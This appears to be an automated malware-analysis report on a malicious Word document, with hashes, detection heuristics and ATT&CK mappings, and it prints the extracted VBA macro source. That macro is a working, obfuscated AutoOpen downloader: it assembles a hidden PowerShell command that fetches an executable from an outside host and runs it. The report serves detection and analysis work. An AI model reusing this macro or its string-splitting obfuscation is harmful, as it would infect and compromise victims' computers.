Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 244b4205acb41670…

MALICIOUS

Office (OLE)

47.5 KB Created: 2017-01-07 22:06:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: 1a7d5e0fe2288a2fd4910c685b9142b3 SHA-1: 63a5e7851c9146554e2e5cef467f7d78c734169a SHA-256: 244b4205acb416700bec459c8b36be379c0b7e3d2a21a57c4a121ba95d229bc4
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including an AutoOpen macro, and a critical 'Shell()' call, indicating malicious intent. The 'SE_ENABLE_LURE' heuristic suggests the document attempts to trick the user into enabling macros. The ClamAV detection and the presence of a VBA macro named 'macros.bas' further support its malicious nature. The macro's obfuscated code likely attempts to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Trojan.X-Mas-5635802-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.X-Mas-5635802-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12475 bytes
SHA-256: 10aca1c8671db42d67b4ee5f28720f42915cb36ca19573a8e84080b4274786c0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "mode"
Sub ladmo()

rbe = "PD"
yg = "h^"
rz = "^T"
da = ".w"
p = "t "
kfa = "^N"
uvr = "  "
esx = "^ "
ok = "S^"
xh = "Ow"
tze = "^w"
mpa = "'"""
azv = "FI"
ywk = "oN"
ca = ";S"
yhc = "io"
wxa = "^o"
Z = "  "
gy = "po"
ps = "BJ"
fy = "Xe"
xso = "xe"
jf = "TI"
wy = "Pr"
t = "  "
azh = "'%"
ibh = "')"
us = "t^"
dc = "^D"
yl = "C^"
ki = "a%"
ynx = "^O"
ze = "^e"
ilg = "E^"
kh = "-^"
od = "  "
wu = "^a"
qju = "^E"
uw = "a%"
x = "E^"
vpo = "/P"
j = ".e"
eh = "eW"
v = "rs"
yh = "Cl"
u = "D."
yp = "//"
c = ".h"
kz = "SY"
d = "  "
pga = "tt"
pl = "',"
wso = "-E"
om = "c^"
iv = " ^"
vj = "S^"
um = ")^"
f = " b"
a = "XE"
wn = "E "
fz = ".E"
bs = "^o"
gby = "os"
jc = "3/"
uzj = "PO"
yqs = "^R"
che = "I^"
ci = "Oa"
opw = "  "
nm = "mp"
k = "er"
ajb = "'%"
vn = "nL"
hr = "LI"
se = "U^"
mnywig = ActiveDocument.DefaultTableStyle
cy = "s^"
E = "Cy"
s = "E^"
he = "Cm"
ol = "E("
icc = "Pr"
efg = "cE"
jhi = "^b"
lho = "XE"
xgu = "^o"
zq = "M."
ew = "LI"
ak = "T^"
egn = "ap"
elq = "^l"
bf = "  "
o = "^w"
ivp = "N^"
sdo = "T^"
ma = "44"
b = "-N"
igf = "^c"
ik = "nD"
eb = "Wi"
wc = "Yp"
gk = "ie"
gi = "nt"
okc = "At"
ep = "on"
xga = "n1"
ivk = "D^"
i = "Yl"
zwy = "aT"
y = "ss"
wga = ".e"
pb = "HI"
ne = "t:"
yk = "p:"
uz = "L^"
ihv = "Nt"
zu = "D^"
ml = "ap"
ub = "EL"
fj = "te"
kg = "  "
kky = "Ta"
pi = "/c"
wq = "^ "
py = " ^"
ym = "-^"
sy = "De"
bg = "xe"
dzi = "^-"
n = "Le"
yzq = "(N"
ums = "S "
eg = "E "
l = "Ex"
ur = "Of"
re = " """
pdy = "pd"
xpi = "GP"
eqf = "e^"
ck = ".^"
irn = ".e"
q = "'h"
icovog = he + u + l + eg + pi + re + uzj + o + s + v + yg + ub + uz + wga + a + uvr + iv + wso + xso + igf + se + jf + ywk + gy + ew + E + Z + opw + f + wc + wu + y + esx + kg + od + b + ynx + icc + ur + che + n + bf + ym + eb + ik + xgu + tze + ok + ak + i + wn + py + pb + zu + sy + kfa + wq + t + yzq + eh + dzi + wxa + ps + x + om + p + d + kz + cy + us + eqf + zq + ivp + ilg + sdo + da + ze + jhi + yl + hr + qju + ihv + um + ck + ivk + xh + vn + ci + dc + azv + elq + ol + q + pga + yk + yp + ep + yhc + xga + c + gby + ne + ma + jc + fj + nm + k + vpo + xpi + yh + gk + gi + j + bg + pl + azh + egn + rbe + zwy + ki + irn + fy + ibh + ca + kky + yqs + rz + kh + wy + bs + efg + vj + ums + ajb + ml + pdy + okc + uw + fz + lho + mpa

If mnywig = "" Then
Shell icovog, 0
End If
End Sub
Sub AutoOpen()
ladmo
End Sub
        

' Processing file: /opt/analyzer/scan_staging/703291eb819f4703943c783f6f869ee2.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1088 bytes
' Macros/VBA/Module1 - 831 bytes
' Macros/VBA/Module2 - 831 bytes
' Macros/VBA/mode - 7652 bytes
' Line #0:
' 	FuncDefn (Sub ladmo())
' Line #1:
' Line #2:
' 	LitStr 0x0002 "PD"
' 	St rbe 
' Line #3:
' 	LitStr 0x0002 "h^"
' 	St yg 
' Line #4:
' 	LitStr 0x0002 "^T"
' 	St rz 
' Line #5:
' 	LitStr 0x0002 ".w"
' 	St da 
' Line #6:
' 	LitStr 0x0002 "t "
' 	St p 
' Line #7:
' 	LitStr 0x0002 "^N"
' 	St kfa 
' Line #8:
' 	LitStr 0x0002 "  "
' 	St uvr 
' Line #9:
' 	LitStr 0x0002 "^ "
' 	St esx 
' Line #10:
' 	LitStr 0x0002 "S^"
' 	St ok 
' Line #11:
' 	LitStr 0x0002 "Ow"
' 	St xh 
' Line #12:
' 	LitStr 0x0002 "^w"
' 	St tze 
' Line #13:
' 	LitStr 0x0002 "'""
' 	St mpa 
' Line #14:
' 	LitStr 0x0002 "FI"
' 	St azv 
' Line #15:
' 	LitStr 0x0002 "oN"
' 	St ywk 
' Line #16:
' 	LitStr 0x0002 ";S"
' 	St ca 
' Line #17:
' 	LitStr 0x0002 "io"
' 	St yhc 
' Line #18:
' 	LitStr 0x0002 "^o"
' 	St wxa 
' Line #19:
' 	LitStr 0x0002 "  "
' 	St Z 
' Line #20:
' 	LitStr 0x0002 "po"
' 	St gy 
' Line #21:
' 	LitStr 0x0002 "BJ"
'
... (truncated)